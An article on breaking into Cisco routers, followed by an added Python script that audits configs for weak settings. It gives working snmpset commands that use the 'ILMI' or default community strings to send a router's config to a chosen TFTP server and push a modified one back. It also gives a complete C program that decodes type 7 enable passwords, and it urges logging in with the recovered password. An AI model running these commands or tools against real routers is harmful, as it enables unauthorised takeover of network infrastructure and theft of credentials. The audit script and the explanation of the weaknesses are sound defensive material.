Cisco Security

I have seen a lot of information regarding security mismanagement of servers: Unix, Linux, NT, Novell, or AS400. However, one point has been missed consistently by many of these articles: routers are very frequently targets of attacks. If you cannot route packets to your destination, you cannot do anything. Many people believe that a Cisco router is impervious to attack; this is simply not the case. In fact, they are a bit frail ...
Basically, the Cisco IOS has more than one level of authority to its system. After connecting to the machine via telnet, ssh or a console cable, you are asked for a password for the machine. This is the general password to the box. Usually it is very common, such as "hostname" or "hostnamenet" or similar. I have even seen them having white space or no password. This is not a secure level of control over the router. The next step is getting the enable password. This enables all of the controls and interface commands via the console. This is a very dangerous level of authority to give users.
I am going to cover a few commonly used methods of obtaining this level of access. The Console method requires you to have physical access to the router.
Console Attack
Now if you actually have physical access to the router there is a method to change/set the enable password. These methods are actually published by Cisco as a method for recovering a router once the enable password has been lost. See http://www.cisco.com/warp/public/474/ and follow the directions for your hardware.
Remote Attack
So, you don't have the key to the server room or telco closet, or is that router 2000 miles away? Are you out of luck? No, of course not; you just have to use a different method to get enable-level authority. Without further ado, let's begin.
Most organizations have different routers doing different tasks. Some are access routers, some perform core backbone routing or edge routing. The point being, most companies have a few of these devices spread out all over their company. Administrators must perform the day-to-day support and monitoring of these devices to be sure that things are running smoothly. This includes making sure interfaces are up, CPU utilization is within acceptable ranges, verifying that there are no unusual traffic patterns that might indicate a hostile attack, and many more tasks. One thing most of these administrators use to help them perform their jobs is SNMP. Simple Network Management Protocol is a widely used method to communicate with many devices, from routers to switches to NT and Unix servers. Almost any network device has the ability to use SNMP for monitoring and alerting.
There are a few bad things about SNMP from a security standpoint though. First, and probably most importantly, SNMP Version 1 has no real concept of authentication. Any device with SNMP set up will happily fulfill any request it receives. (To have a request accepted, the only thing that is required is a community name, a small string of text used for configuration.)
Although SNMP Version 2 and 3 have provisions for encrypting packets, this is not widely deployed, and, you guessed it, never enabled by default.
The second bad thing about SNMP is that it usually also comes enabled by default, and the community names are set to the defaults of "public" and "private". The public community usually can read information and the private community can set information. Eek!
The third bad thing about SNMP is that it is an extremely "noisy" protocol. This means that it sends a lot of network traffic back and forth. A common implementation will employ a management workstation (such as a network admin's) that monitors many different devices. Each device may be polled every 60 seconds. Each packet that goes out contains these community strings. A quick "sniff" of the network can provide you with these in the event they have been changed from the defaults.
The fourth bad thing I want to bring up in this list of negatives about SNMP is a very common misconfiguration allowing ANY host to access a device via this protocol. Most networks I have seen allow any node on the entire Internet to communicate with their internal network via SNMP.
Finally, if all that wasn't enough... ALL Cisco IOS router images prior to IOS 12.2 have a hidden backdoor read/write SNMP community string of "ILMI". All routers before 12.2 are sitting there WIDE-OPEN!!
So what can SNMP give the user? Among many very useful things like CPU utilization, interface statistics and port details, it also can be used to set various items inside the router. We are going to focus on one specific item here.
The ability to upload and download config files. The config file is essentially a text file that the router uses to load its configuration when it boots. This file contains the information for network addresses, interfaces, routing policies, and even passwords. This is really ground zero on the router.
By simply guessing or sniffing the community names you open a window wide enough to bring down an entire network.
Allow me to demonstrate. ...
# snmpset -c ILMI #.#.#.# .1.3.6.1.4.1.9.2.1.55.$.$.$.$ router-config

(Where $.$.$.$ is the TFTP server you want the config file sent to and #.#.#.# is the router IP address.)
Now you have the config file; make whatever changes you need to, then upload it back with

# snmpset -c ILMI #.#.#.# .1.3.6.1.4.1.9.2.1.53.$.$.$.$ router-config
Password Cracking
You have a nice config file to work with, now what? First you need to get some of the information off of the router. Look inside that config file you just stole. The information you are specifically interested in is the:

enable secret 5 efb487d9fbhen5oy485y&%#B7gtu32ib&

or perhaps

enable password 7 08204E
This is the encrypted string that contains the password to the box. There is a hint here given to us by Cisco. The 5 is telling us that the password is encrypted by MD5. The 7 is a much weaker algorithm that can easily be reversed. Now all that is left is cracking it. Mudge has posted the basics of what the Cisco "7" algorithm is; let's take a look at what he has to say:
enable password 7 08204E

The encrypted string is 08204E.
"It must be an even length of digits and the first two digits are used as a base 10 index into the XOR string. The length of the plaintext password is strlen(enc_pw) -2 / 2. In this case 2 chars. 08 is the index into the XOR string.
2 is multiplied by 16 (or left shifted 4 times) then the next digit (0) is added to it. [ == 32] 32 XOR xorstring[08] = 'a'
Move to the next two digits and repeat - 4 * 16 = 64 64 + 14 (E) = 78 increment the index into the XOR string 78 XOR xorstring[08] = 'b' "
Given this information it is trivial to code a quick C program that can be used to crank out the password. For example:
#include <stdlib.h>
#include <ctype.h>
#include <string.h>
#include <stdio.h>

/* Number of entries in the XOR table below; a two-digit seed NN selects value[NN - 1] */
#define TABLE_LEN 21

int *HexPairsToIntArray(char *, int *, int *);

int main(int argc, char **argv)
{
    char Crypto[256];
    char value[] = "tfd;kfoA,.iyewrkldJKD";   /* XOR table, as published here */
    int Elements;
    int Error;
    int i;
    int unencchar;
    int indy = 0;
    int *Keys = NULL;
    int index;
    size_t len;

    if (argc < 2)
    {
        printf("Input String to Decode : ");
        if (fgets(Crypto, sizeof Crypto, stdin) == NULL)
            return 1;
        Crypto[strcspn(Crypto, "\r\n")] = '\0';   /* strip the newline fgets keeps */
    }
    else
    {
        strncpy(Crypto, argv[1], sizeof Crypto - 1);   /* bounded copy of argv[1] */
        Crypto[sizeof Crypto - 1] = '\0';
    }

    /* The encoded string is a two-digit seed followed by hex pairs, so it must
       be an even number of digits and at least four characters long */
    len = strlen(Crypto);
    if (len < 4 || len % 2 != 0)
    {
        printf("Encoded string must be an even number of hex digits (seed + data)\n");
        return 1;
    }

    Keys = HexPairsToIntArray(Crypto, &Elements, &Error);
    if (NULL == Keys)
    {
        printf("Error allocating memory for keys\n");
    }
    else
    {
        if (Error != 0)
        {
            printf("Data error? Code %d\n", Error);
        }
        else
        {
            printf("Decoding... %s\n\n", Crypto);
            for (i = 0; i < Elements; i++)
            {
                if (i < 1)
                {
                    /* First pair is the seed, read as base 10 (see Mudge above) */
                    index = (Crypto[0] - '0') * 10 + (Crypto[1] - '0');
                    if (index < 1 || index > TABLE_LEN)
                    {
                        printf("Seed %d is outside the XOR table\n", index);
                        break;
                    }
                    indy = index - 1;
                }
                else
                {
                    /* Each remaining byte XORed with the next table entry
                       yields one plaintext character */
                    unencchar = Keys[i] ^ value[indy];
                    printf("Key[%d] = %d XOR %d = %c\n", i, Keys[i],
                           value[indy], unencchar);
                    indy++;
                    if (indy == TABLE_LEN)
                    {
                        indy = 0;   /* wrap around the table */
                    }
                }
            }
        }
        free(Keys);
    }
    return 0;
}

/* Convert a string of hex digit pairs into an int array (one int per pair).
   *n receives the element count; *err is 1 for a NULL input, 2 for a bad digit. */
int *HexPairsToIntArray(char *s, int *n, int *err)
{
    int *array = NULL;
    char hextran[] = "0123456789ABCDEF";
    char *p;
    int i = 0;

    *err = 0;
    if (s)
    {
        *n = strlen(s) / 2;
        array = calloc(*n, sizeof(int));
        if (array != NULL)
        {
            for (i = 0; i < *n && 0 == *err; i++)
            {
                /* toupper() lets lowercase hex input be accepted as well */
                p = strchr(hextran, toupper((unsigned char)*s));
                if (p != NULL)
                {
                    array[i] = ((p - hextran) << 4);   /* high nibble */
                    s++;
                    p = strchr(hextran, toupper((unsigned char)*s));
                    if (p != NULL)
                    {
                        array[i] |= (p - hextran);     /* low nibble */
                        s++;
                    }
                    else
                    {
                        *err = 2;
                    }
                }
                else
                {
                    *err = 2;
                }
            }
        }
    }
    else
    {
        *err = 1;
    }
    return array;
}
The above ANSI C code was written by me and is available to anyone via GPL licensing. This is an example of running it (the password is 'ab', the encrypted string is '08204E'):

Input String to Decode : 08204E
Decoding... 08204E

Key[1] = 32 XOR 65 = a
Key[2] = 78 XOR 44 = b
So hop back on that router and type "enable". When prompted for the password we know it's going to be "ab". And now we know how to crack those pesky passwords...
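The flip side for an administrator is auditing configs for exactly the weaknesses this article walks through: default or backdoor community names, RW communities, communities with no access-list limiting which hosts may query them, and reversible "enable password" / type 7 passwords instead of "enable secret". The following Python audit is an added example, not code from the original article; both sample configs are constructed here, and the hash values are placeholders.

```python
import re

# Constructed sample config showing the weak settings described in the article
WEAK_CONFIG = """\
enable password 7 08204E
username admin password 7 08204E
snmp-server community public RO
snmp-server community private RW
snmp-server community ILMI RW
"""

# Constructed hardened counterpart: enable secret, a non-default read-only
# community tied to access-list 10 (hash values are placeholders)
HARDENED_CONFIG = """\
enable secret 5 $1$PLACEHOLDER$hash
username admin secret 5 $1$PLACEHOLDER$hash
access-list 10 permit 192.0.2.10
snmp-server community n0tdefault RO 10
"""

# Names the article calls defaults or the hidden ILMI string; the hidden one
# never shows in a config, so only explicitly configured lines are caught here
DEFAULT_COMMUNITIES = {"public", "private", "ilmi"}
SNMP_RE = re.compile(r"snmp-server community\s+(\S+)(?:\s+view\s+\S+)?"
                     r"(?:\s+(RO|RW))?(?:\s+(\S+))?$")
USER_PW7_RE = re.compile(r"username\s+\S+\s+password\s+7\s")


def audit_config(text):
    """Return (line, finding) pairs for each weak setting in an IOS config."""
    findings = []
    has_secret = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("enable secret"):
            has_secret = True
        elif line.startswith("enable password"):
            findings.append((line, "enable password is reversible; use enable secret"))
        if USER_PW7_RE.match(line):
            findings.append((line, "type 7 user password is reversible; use 'username ... secret'"))
        m = SNMP_RE.match(line)
        if m:
            name, mode, acl = m.groups()
            if name.lower() in DEFAULT_COMMUNITIES:
                findings.append((line, f"default or backdoor community name '{name}'"))
            if mode == "RW":
                findings.append((line, "RW community permits config upload/download over SNMP"))
            if acl is None:
                findings.append((line, "no access-list on community: any host can query it"))
    if not has_secret:
        findings.append(("<global>", "no enable secret configured"))
    return findings
```

Running audit_config on WEAK_CONFIG reports eleven findings; the hardened sample reports none.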